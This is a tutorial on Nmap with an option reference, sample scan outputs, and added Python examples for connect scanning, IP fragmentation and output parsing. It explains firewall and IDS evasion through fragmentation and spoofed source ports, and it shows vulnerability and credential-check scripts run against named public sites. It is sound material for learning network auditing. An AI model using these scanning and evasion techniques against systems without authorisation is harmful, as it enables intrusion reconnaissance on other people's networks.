Nmap is a free, open-source utility for network discovery and security auditing. Many system and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine which hosts are available on the network, which services those hosts offer, which operating systems they run, what kind of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to scan large networks quickly, but works just as well against a single host.
Nmap host discovery scans
Host discovery is sometimes called ping scanning, but it goes well beyond the simple ICMP echo request that the ubiquitous ping tool sends. The purpose of these probes is to get a response that shows whether an IP address is live (in use by a host or network device). Host discovery finds the machines scattered across a sea of IP addresses.
Nmap command-line option reference: before scanning, a look at the options.
-sT TCP connect() scan, the most basic form of TCP scanning: it completes a full three-way handshake on every port through the connect() system call. It is easy to detect, because the target's logs fill up with connections that were opened and immediately dropped, plus the resulting error messages.
-sS TCP SYN scan. Because it never opens a full TCP connection it is usually called half-open scanning. Its main advantage is that few systems log it: the handshake is never completed, so the listening application never sees a connection. You need root privileges to craft the raw SYN packets.
-sF, -sX, -sN Stealth FIN, Xmas Tree and Null scan modes. They rely on the rule that a closed port must answer the probe with an RST while an open port must ignore the malformed packet (RFC 793, p. 64). Windows and other non-RFC-compliant stacks send RST from every port, so these scans cannot tell open from closed there.
-sP Ping scan: check which hosts on the network are up. When a host blocks ICMP echo requests a pure ICMP ping scan finds nothing. By default nmap runs host discovery first and only port-scans hosts that respond; -sP stops after the discovery step. (In current versions -sP is a deprecated alias for -sn.)
-sU UDP scan. Use this to find out which UDP (User Datagram Protocol, RFC 768) services a host offers.
-sA ACK scan. This advanced technique is used to map firewall rulesets, telling filtered ports from unfiltered ones; it does not tell you whether a port is open.
-sW Window scan, very similar to the ACK scan, but on some systems it can also tell open from closed by looking at the TCP window size in the RST.
-sR RPC scan, used together with the other port scan methods. (Removed from modern nmap; -sV performs RPC grinding instead.)
-b FTP bounce attack: use an FTP server behind a firewall as a proxy and port-scan from it.
-P0 Do not ping hosts before scanning. (Now spelled -Pn; -P0 is still accepted.)
-PT Use a TCP ping (an ACK packet) to determine which hosts are up before scanning. (Now -PA.)
-PS For root, make nmap send SYN packets instead of ACK packets for the TCP ping. A port list may follow, e.g. -PS22,80,443.
-PI Use a real ping (ICMP echo request) to check whether the target is up. (Now -PE.)
-PB The default ping option: run the ACK (-PT) and ICMP (-PI) probes in parallel. If a firewall filters one kind of packet the other may still get through. (This option no longer exists; the modern privileged default sends an ICMP echo, a SYN to port 443, an ACK to port 80 and an ICMP timestamp request.)
-O Enable TCP/IP fingerprinting to identify the remote host's operating system.
-I Enable the reverse ident scan, which asks the target's identd which user owns each listening port. (Removed from modern nmap.)
-f Send the SYN, FIN, Xmas and Null probes as small fragmented IP packets. Splitting the TCP header across fragments makes it harder for packet filters and intrusion detection systems that do not reassemble fragments to see what you are doing.
-v Verbose mode. Strongly recommended: it reports details of what is happening during the scan.
-S <IP> In some cases nmap cannot determine your source address (it will tell you). Use this option to give your IP address.
-g port Set the source port for the scan. Some naive firewalls and packet-filter rulesets let packets with source port DNS (53) or FTP-DATA (20) through to establish connections; an attacker who sets the source port to 20 or 53 slips past such rules.
-oN Write the scan results in human-readable form to the file logfilename.
-oS Write the results in sCRiPt KiDDi3 style, a joke format. For machine-readable output use -oG (grepable) or -oX (XML).
--host_timeout Time allowed for scanning one host, in milliseconds. By default there is no limit. (Now --host-timeout.)
--max_rtt_timeout Maximum time to wait for a probe response, in milliseconds, before retransmitting or giving up. The default is about 9000 ms. (Now --max-rtt-timeout.)
--min_rtt_timeout Make nmap wait at least this long for each probe, in milliseconds. (Now --min-rtt-timeout.)
-M count Maximum number of sockets used in parallel for a TCP connect() scan. (Replaced by --max-parallelism.)
Ping sweep: count the live hosts on a whole network segment.
[root@localhost ~]# nmap -sP 192.168.1.0/24
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 21:41 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0011s latency).
MAC Address: 44:7D:3F:07:2C:A1 (Unknown)
Nmap scan report for 192.168.1.2
Host is up (0.000095s latency).
MAC Address: FF:8E:BB:EE:AA:B4 (Unknown)
Nmap scan report for 192.168.1.3
Host is up (0.051s latency).
MAC Address: CC:C0:AC:22:DD:07 (Unknown)
Nmap scan report for 192.168.1.7
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 50.15 seconds
Skipping the ping probe: some hosts drop ping, so -P0 (-Pn in current versions) skips host discovery and port-scans the address regardless.
On a single host you already know is up this saves the discovery round trip; on a large range it is slower, not faster, because every address, live or dead, gets a full port scan.
[root@localhost ~]# nmap -P0 192.168.1.7
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 21:52 EDT
Nmap scan report for 192.168.1.7
Host is up (0.0000090s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds
Listing the addresses in a subnet: -sL (list scan) prints every host in the range without sending any packets to the targets; only reverse-DNS lookups are performed.
[root@localhost ~]# nmap -sL 192.168.1.0/24
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 21:43 EDT
Nmap scan report for 192.168.1.0
Nmap scan report for 192.168.1.1
Nmap scan report for 192.168.1.2
Nmap scan report for 192.168.1.3
Nmap scan report for 192.168.1.4
Nmap scan report for 192.168.1.5
...omitted...
Nmap done: 256 IP addresses (0 hosts up) scanned in 4.03 seconds
掃描IP地址范圍: 可以指定一個IP地址范圍
[root@localhost ~]# nmap -sP 192.168.1.1-10
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 22:17 EDT
Nmap scan report for 192.168.1.1
Host is up (0.00087s latency).
MAC Address: 1A:7D:2E:AC:6E:1A (Unknown)
Nmap scan report for 192.168.1.2
Host is up (0.00016s latency).
MAC Address: 81:8E:38:BC:7C:8E (Unknown)
Nmap scan report for 192.168.1.4
Host is up (0.061s latency).
MAC Address: 81:29:81:64:81:A3 (Unknown)
Nmap scan report for 192.168.1.5
Host is up (0.060s latency).
MAC Address: EA:3A:EA:EA:81:EA (Unknown)
Nmap scan report for 192.168.1.7
Host is up.
Nmap done: 10 IP addresses (5 hosts up) scanned in 0.26 seconds
SYN-probe host discovery (-PS): send a TCP SYN to the listed ports as the discovery probe, e.g. -PS22,80,443. The port list only affects host discovery; the port scan that follows still covers the default 1000 ports, which is why 3306 appears below. Use -p to restrict the ports actually scanned.
[root@localhost ~]# nmap -PS22,80,443 192.168.1.7
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 22:15 EDT
Nmap scan report for 192.168.1.7
Host is up (0.0000090s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds
UDP-probe host discovery (-PU): send UDP packets to the listed ports as the discovery probe (port 40125 when none is given). As with -PS this only changes how the host is found, not which ports are scanned.
[root@localhost ~]# nmap -PU 192.168.1.7
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 21:55 EDT
Nmap scan report for 192.168.1.7
Host is up (0.0000090s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds
SYN scan: the half-open scan (-sS) described above.
[root@localhost ~]# nmap -sS 192.168.1.7
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 22:01 EDT
Nmap scan report for 192.168.1.7
Host is up (0.0000090s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds
TCP connect scan: -sT completes a full connection on every probed port.
[root@localhost ~]# nmap -sT 192.168.1.7
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 22:01 EDT
Nmap scan report for 192.168.1.7
Host is up (0.0012s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.10 seconds
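What a connect() scan does on the wire, and why the target can log it, as an added Python example that is not part of the original page: it stands up a listener on 127.0.0.1, classifies ports with the same open/closed/filtered logic nmap applies for -sT, and then shows that the listener saw the connection. A connect to a port with nothing listening gets an RST (ECONNREFUSED) and is reported closed; a probe that gets no answer before the timeout is reported filtered. Port numbers are assigned by the kernel at run time; nothing leaves the loopback interface.

```python
import socket
from typing import Dict, List, Tuple

TARGET = "127.0.0.1"  # the scan stays on the loopback interface


def classify_port(host: str, port: int, timeout: float = 1.0) -> str:
    """Classify one TCP port the way nmap -sT does, with a full connect()."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))        # completes the three-way handshake
        return "open"
    except ConnectionRefusedError:     # RST came back: nothing is listening
        return "closed"
    except (socket.timeout, OSError):  # no answer or unreachable: a filter ate it
        return "filtered"
    finally:
        s.close()                      # nmap tears the connection down at once too


def connect_scan(host: str, ports: List[int], timeout: float = 1.0) -> Dict[int, str]:
    """Scan a list of ports and return {port: state}."""
    return {p: classify_port(host, p, timeout) for p in ports}


def demo() -> dict:
    """Start a listener, scan it and a closed port, then read the target's 'log'."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((TARGET, 0))         # port 0: the kernel picks a free port
    listener.listen(5)
    open_port = listener.getsockname()[1]

    # Grab another free port and release it so it is closed when scanned.
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind((TARGET, 0))
    closed_port = probe.getsockname()[1]
    probe.close()

    states = connect_scan(TARGET, [open_port, closed_port])

    # Target side: the kernel completed the handshake and queued the connection,
    # so the service's accept() sees it even though the scanner already hung up.
    # That is the log entry a -sT scan leaves and a -sS scan does not.
    target_log: List[Tuple[str, int]] = []
    listener.settimeout(0.5)
    while True:
        try:
            conn, peer = listener.accept()
        except socket.timeout:
            break
        target_log.append(peer)
        conn.close()
    listener.close()
    return {"open_port": open_port, "closed_port": closed_port,
            "states": states, "target_log": target_log}


if __name__ == "__main__":
    print(demo())
```

The 1 s timeout is what makes "filtered" a verdict rather than a guess: nmap's --max-rtt-timeout plays the same role, and lowering it on a slow link turns open ports into false "filtered" results.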
UDP scan: -sU. The state open|filtered means no reply came back, which for UDP can mean either an open service that stayed silent or a dropped probe; only an ICMP port-unreachable proves a port closed, so UDP scans are slow and ambiguous.
[root@localhost ~]# nmap -sU 192.168.1.7
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 22:02 EDT
Nmap scan report for 192.168.1.7
Host is up (0.0010s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
68/udp open|filtered dhcpc
Nmap done: 1 IP address (1 host up) scanned in 1.52 seconds
IP protocol scan: -sO determines which IP protocols (ICMP, TCP, UDP, ...) the target accepts.
[root@localhost ~]# nmap -sO 192.168.1.7
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 22:04 EDT
Nmap scan report for 192.168.1.7
Host is up (0.000016s latency).
Not shown: 249 closed protocols
PROTOCOL STATE SERVICE
1 open icmp
2 open|filtered igmp
6 open tcp
17 open udp
103 open|filtered pim
136 open|filtered udplite
255 open|filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 1.37 seconds
OS detection: -O fingerprints the target's operating system. The result is a best guess and should be treated as such. Network Distance: 0 hops below shows that the target here is the scanning machine itself.
[root@localhost ~]# nmap -O 192.168.1.7
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 22:06 EDT
Nmap scan report for 192.168.1.7
Host is up (0.000056s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.7 - 3.9
Network Distance: 0 hops
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.82 seconds
Service version detection: -sV probes open ports for the service version. A ? in the VERSION column means the service answered but no signature matched.
[root@localhost ~]# nmap -sV 192.168.1.7
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 22:08 EDT
Nmap scan report for 192.168.1.7
Host is up (0.0000090s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open mysql ?
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.43 seconds
Scanning several hosts: give multiple targets on one command line. Note the difference in the two reports below: 192.168.1.2 shows "filtered ports", meaning a host firewall silently drops probes, while 192.168.1.7 shows "closed ports", meaning it answers each probe with an RST.
[root@localhost ~]# nmap 192.168.1.2 192.168.1.7
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 22:11 EDT
Nmap scan report for 192.168.1.2
Host is up (0.00052s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: F4:8E:38:EE:7C:B4 (Unknown)
Nmap scan report for 192.168.1.7
Host is up (0.000010s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
Nmap done: 2 IP addresses (2 hosts up) scanned in 4.26 seconds
Targets from a file: -iL reads hostnames or addresses from a file, one per line.
[root@localhost ~]# cat lyshark.log
localhost
www.baidu.com
192.168.1.7
[root@localhost ~]# nmap -iL lyshark.log
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 22:13 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0000090s latency).
Other addresses for localhost (not scanned): 127.0.0.1
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
3306/tcp open mysql
Nmap scan report for 192.168.1.7
Host is up (0.0000090s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
Nmap done: 3 IP addresses (2 hosts up) scanned in 3.09 seconds
Evading packet filters with fragmentation: -f splits the probe into 8-byte IP fragments, and --mtu sets your own fragment size,
which must be a multiple of 8 (8, 16, 24, ...; --mtu 4 is rejected).
This can get past packet filters and intrusion detection systems that inspect only the first fragment, but a firewall that reassembles fragments before filtering is unaffected.
[root@localhost ~]# nmap -f 127.0.0.1
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 03:12 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000012s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds
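How -f and --mtu split a probe, as an added Python example that is mine and not nmap's code: it builds a 20-byte TCP SYN header and a raw IPv4 header, cuts the TCP header into fragments of the requested size, and checks what a filter that inspects only the first fragment gets to see. It only constructs bytes, so nothing is sent and no root is needed. The addresses and IP ID are made up for the example.

```python
import socket
import struct
from typing import Dict, List

IPPROTO_TCP = 6


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum, as used in the IPv4 header."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ipv4_header(src: str, dst: str, proto: int, payload_len: int,
                ident: int, offset: int, more: bool) -> bytes:
    """20-byte IPv4 header; offset is in bytes and must be a multiple of 8."""
    flags_frag = (0x2000 if more else 0) | ((offset // 8) & 0x1FFF)  # MF flag + 13-bit offset
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, ident,
                      flags_frag, 64, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def tcp_syn(sport: int, dport: int, seq: int = 0) -> bytes:
    """Minimal 20-byte TCP header with only SYN set (TCP checksum left zero for brevity)."""
    return struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x02, 1024, 0, 0)


def fragment(src: str, dst: str, proto: int, payload: bytes, mtu: int,
             ident: int = 0x1234) -> List[bytes]:
    """Split payload into IP fragments of `mtu` bytes each, like nmap -f / --mtu."""
    if mtu <= 0 or mtu % 8:
        # Fragment offsets are counted in 8-byte units; this is why nmap rejects --mtu 4.
        raise ValueError("fragment size must be a positive multiple of 8")
    frags = []
    for off in range(0, len(payload), mtu):
        chunk = payload[off:off + mtu]
        more = off + mtu < len(payload)  # MF is set on every fragment but the last
        frags.append(ipv4_header(src, dst, proto, len(chunk), ident, off, more) + chunk)
    return frags


def parse_fragment(pkt: bytes) -> Dict[str, object]:
    """Pull ID, offset, MF flag and payload back out of one fragment."""
    _, _, total_len, ident, flags_frag, _, proto, _ = struct.unpack("!BBHHHBBH", pkt[:12])
    return {"ident": ident, "proto": proto, "offset": (flags_frag & 0x1FFF) * 8,
            "more": bool(flags_frag & 0x2000), "payload": pkt[20:total_len]}


def reassemble(frags: List[bytes]) -> bytes:
    """What a reassembling firewall or the target kernel does before looking at TCP."""
    parts = sorted((parse_fragment(f) for f in frags), key=lambda p: p["offset"])
    return b"".join(p["payload"] for p in parts)


def flags_visible_in_first_fragment(frags: List[bytes]) -> bool:
    """A filter that only inspects the first fragment needs TCP byte 13 (the flags) in it."""
    return len(parse_fragment(frags[0])["payload"]) >= 14


if __name__ == "__main__":
    syn = tcp_syn(40000, 22)
    for mtu in (8, 16):
        frags = fragment("192.168.1.10", "192.168.1.7", IPPROTO_TCP, syn, mtu)
        print(mtu, len(frags), "fragments, SYN flag visible in first:",
              flags_visible_in_first_fragment(frags))
```

With the default 8-byte fragments the first fragment holds only the source and destination ports and half of the sequence number; the TCP flags sit in the second fragment, so a filter that matches on SYN without reassembling sees nothing to block. With --mtu 16 the flags are back in the first fragment and the evasion is gone.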
Other basics:
nmap localhost #list the ports currently open on the local host
nmap -p 1024-65535 localhost #list the open ports in the range 1024-65535 on the local host
nmap -PS 192.168.21.163 #use a TCP SYN probe for host discovery, then scan the default ports
nmap -PS22,80,3306 192.168.21.163 #use SYN probes to ports 22, 80 and 3306 for host discovery
nmap -O 192.168.21.163 #detect the target's operating system
nmap -A 192.168.21.163 #aggressive scan: OS detection, version detection, default scripts and traceroute
Nmap scan scripts
Nmap is not only a port scanner and service detector; it also has a powerful scripting engine. Nmap scripts (NSE)
can probe a server quickly. They normally live in /usr/share/nmap/scripts
and have the extension .nse.
The most commonly used scripts follow.
Scanning for sensitive web directories: --script=http-enum.nse
enumerates commonly exposed paths on a web site.
[root@localhost ~]# nmap -p 80 --script=http-enum.nse www.mkdirs.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 01:49 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000010s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
80/tcp open http
| http-enum:
| /login.php: Possible admin folder
| /robots.txt: Robots file
| /config/: Potentially interesting folder w/ directory listing
| /docs/: Potentially interesting folder w/ directory listing
| /external/: Potentially interesting folder w/ directory listing
|_ /icons/: Potentially interesting folder w/ directory listing
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 1.18 seconds
Authentication checks: the auth category holds the scripts that deal with credentials, such as anonymous FTP, empty or default passwords and user enumeration. It is useful for spotting weak credentials on some applications; despite the category name it does not bypass authentication.
[root@localhost ~]# nmap --script=auth www.mkdirs.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:16 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0000090s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 6 Oct 30 19:45 pub
22/tcp open ssh
25/tcp open smtp
| smtp-enum-users:
|_ root
80/tcp open http
| http-domino-enum-passwords:
|_ ERROR: No valid credentials were found
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 0.89 seconds
Default script scan: --script=default (the same set that -sC runs) collects information about each application service; with that in hand, attacks can be aimed at specific services.
[root@localhost ~]# nmap --script=default www.mkdirs.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:21 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000010s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 6 Oct 30 19:45 pub
22/tcp open ssh
| ssh-hostkey: 2048 c2:89:44:fc:e3:1b:5a:65:a1:6e:11:34:73:6d:d5:04 (RSA)
|_256 54:0e:d4:47:2f:b2:d4:2b:33:b6:d8:35:66:2d:a2:aa (ECDSA)
3306/tcp open mysql
| mysql-info: Protocol: 10
| Version: 5.5.60-MariaDB
| Thread ID: 10408
| Status: Autocommit
|_Salt: <D"y]F(2
Nmap done: 1 IP address (1 host up) scanned in 1.06 seconds
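The normal output shown throughout this page is what you end up parsing when a sweep covers hundreds of hosts and you want the anonymous-FTP or TRACE-enabled findings out of it. The following added example is my code, not nmap's or the page author's: it parses the host, port and NSE script lines of that format into Python objects and provides a triage query over script output. The sample text is constructed from the outputs shown above (the multi-host scan, the default-script scan, and one pre-scan block from the broadcast example). For real work prefer -oX and an XML parser; the normal format is for humans and not guaranteed stable between versions.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample, assembled from the outputs shown earlier on this page.
SAMPLE = """\
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-19 22:11 EDT
Pre-scan script results:
| broadcast-dhcp-discover:
|   IP Offered: 192.168.1.14
|_  Server Identifier: 192.168.1.1
Nmap scan report for 192.168.1.2
Host is up (0.00052s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: F4:8E:38:EE:7C:B4 (Unknown)
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000010s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 6 Oct 30 19:45 pub
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 2048 c2:89:44:fc:e3:1b:5a:65:a1:6e:11:34:73:6d:d5:04 (RSA)
|_256 54:0e:d4:47:2f:b2:d4:2b:33:b6:d8:35:66:2d:a2:aa (ECDSA)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-trace: TRACE is enabled
3306/tcp open  mysql
| mysql-info: Protocol: 10
|   Version: 5.5.60-MariaDB
|_  Salt: <D"y]F(2
Host script results:
| whois: Record found at whois.apnic.net
|_country: CN
Nmap done: 2 IP addresses (2 hosts up) scanned in 4.26 seconds
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)(?: \((\d+\.\d+\.\d+\.\d+)\))?")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp|sctp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
SCRIPT_START_RE = re.compile(r"^([\w.-]+):\s*(.*)$")  # "<script-name>: first line"


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str = ""
    scripts: Dict[str, List[str]] = field(default_factory=dict)


@dataclass
class Host:
    name: str
    addr: str
    up: bool = False
    mac: str = ""
    ports: List[Port] = field(default_factory=list)
    host_scripts: Dict[str, List[str]] = field(default_factory=dict)


def _script_line(line: str, bucket: Dict[str, List[str]], current: Optional[str]) -> Optional[str]:
    """Attach one '| ...' line to bucket; return the name of the block still open, if any."""
    closes = line.startswith("|_")        # '|_' marks the last line of a script's block
    body = line.lstrip("|_").strip()
    if current is None:                    # not inside a block: this must start one
        m = SCRIPT_START_RE.match(body)
        if not m:
            return None
        name, rest = m.group(1), m.group(2)
        bucket[name] = [rest] if rest else []
        return None if closes else name
    bucket[current].append(body)           # continuation line of the open block
    return None if closes else current


def parse_nmap_output(text: str) -> Tuple[List[Host], Dict[str, List[str]]]:
    """Parse nmap normal output into (hosts, pre-scan script results)."""
    hosts: List[Host] = []
    prescan: Dict[str, List[str]] = {}
    host, bucket, current = None, prescan, None   # script lines before any host are pre-scan
    for line in text.splitlines():
        line = line.rstrip()
        m = HOST_RE.match(line)
        if m:
            host = Host(name=m.group(1), addr=m.group(2) or m.group(1))
            hosts.append(host)
            bucket, current = host.host_scripts, None
        elif line.startswith("|"):
            current = _script_line(line, bucket, current)
        elif host is None:
            continue
        elif line.startswith("Host is up"):
            host.up = True
        elif line.startswith("MAC Address:"):
            host.mac = line.split()[2]
        elif line.startswith("Host script results:"):
            bucket, current = host.host_scripts, None
        else:
            m = PORT_RE.match(line)
            if m:
                port = Port(int(m.group(1)), m.group(2), m.group(3), m.group(4),
                            (m.group(5) or "").strip())
                host.ports.append(port)
                bucket, current = port.scripts, None  # following '|' lines belong to this port
    return hosts, prescan


def open_ports(host: Host) -> List[int]:
    return [p.number for p in host.ports if p.state == "open"]


def script_hits(hosts: List[Host], script: str, needle: str) -> List[Tuple[str, int]]:
    """(addr, port) pairs whose output for `script` contains `needle`: a quick triage filter."""
    return [(h.addr, p.number) for h in hosts for p in h.ports
            if any(needle in out for out in p.scripts.get(script, []))]
```

The '|' / '|_' convention is the only structure the format offers: a block opens on a "name:" line and the '|_' line closes it, so a continuation line such as "|_country: CN" is only treated as content because a block is still open. script_hits(hosts, "ftp-anon", "Anonymous FTP login allowed") is the kind of one-liner that turns a 200-host scan into a short list of things to fix.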
Checking for common vulnerabilities: --script=vuln
runs the vulnerability-check scripts against the site. http-enum belongs to this category too, which is why the directory listing appears again.
[root@localhost ~]# nmap --script=vuln www.mkdirs.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:24 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000017s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
80/tcp open http
| http-enum:
| /login.php: Possible admin folder
| /robots.txt: Robots file
| /config/: Potentially interesting folder w/ directory listing
| /docs/: Potentially interesting folder w/ directory listing
| /external/: Potentially interesting folder w/ directory listing
|_ /icons/: Potentially interesting folder w/ directory listing
|_http-fileupload-exploiter:
|_http-frontpage-login: false
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds
Discovering services on the local network: --script=broadcast
runs the broadcast scripts, which listen on and query the local segment (DHCP, ARP, routing protocols and more) and so reveal services beyond the target given on the command line.
[root@localhost ~]# nmap -n -p445 --script=broadcast 127.0.0.1
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:28 EDT
Pre-scan script results:
| broadcast-dhcp-discover:
| IP Offered: 192.168.1.14
| Server Identifier: 192.168.1.1
| Subnet Mask: 255.255.255.0
| Router: 192.168.1.1
|_ Domain Name Server: 192.168.1.1
| broadcast-eigrp-discovery:
|_ ERROR: Couldn't get an A.S value.
| broadcast-listener:
| ether
| ARP Request
| sender ip sender mac target ip
| 192.168.1.1 43:72:23:04:56:21 192.168.1.2
| 192.168.1.2 B4:8C:28:BE:4C:34 192.168.1.1
| EIGRP Update
........
WHOIS lookup: --script whois
queries the regional registry for the address block the site belongs to.
[root@localhost ~]# nmap --script whois www.baidu.com
Host script results:
| whois: Record found at whois.apnic.net
| inetnum: 61.135.0.0 - 61.135.255.255
| netname: UNICOM-BJ
| descr: China Unicom Beijing province network
| country: CN
| person: ChinaUnicom Hostmaster
|_email: hqs-ipabuse@chinaunicom.cn
Nmap done: 1 IP address (1 host up) scanned in 4.76 seconds
Detailed WHOIS and geolocation: the external category uses third-party databases and services for whois, geolocation and similar lookups.
[root@localhost ~]# nmap --script external www.baidu.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:31 EDT
Nmap scan report for www.baidu.com (61.135.169.125)
Host is up (0.018s latency).
|_http-robtex-shared-ns: ERROR: Script execution failed (use -d to debug)
| ip-geolocation-geoplugin:
| 61.135.169.125 (www.baidu.com)
| coordinates (lat,lon): 39.9288,116.3889
|_ state: Beijing, China
|_ip-geolocation-maxmind: ERROR: Script execution failed (use -d to debug)
| whois: Record found at whois.apnic.net
| inetnum: 61.135.0.0 - 61.135.255.255
| netname: UNICOM-BJ
| descr: China Unicom Beijing province network
|_country: CN
.....
Finding the NetBIOS master browser: --script=broadcast-netbios-master-browser
reports the master browser on the local segment (here 192.168.1.2, Web-Server in WORKGROUP). It does not find the gateway; the router 192.168.1.1 appears below only because it was given as the target for the port scan.
[root@localhost ~]# nmap --script=broadcast-netbios-master-browser 192.168.1.1
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:05 EDT
Pre-scan script results:
| broadcast-netbios-master-browser:
| ip server domain
|_192.168.1.2 Web-Server WORKGROUP
Nmap scan report for 192.168.1.1
Host is up (0.0011s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
80/tcp filtered http
1900/tcp open upnp
MAC Address: 42:1C:1B:E7:B1:B2 (TP-Link)
Reading a site's robots.txt: --script=http-robots.txt.nse
lists the paths the file disallows, which often point at content the owner would rather not have indexed.
[root@localhost scripts]# nmap --script=http-robots.txt.nse www.baidu.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:12 EDT
Nmap scan report for www.baidu.com (61.135.169.125)
Host is up (0.019s latency).
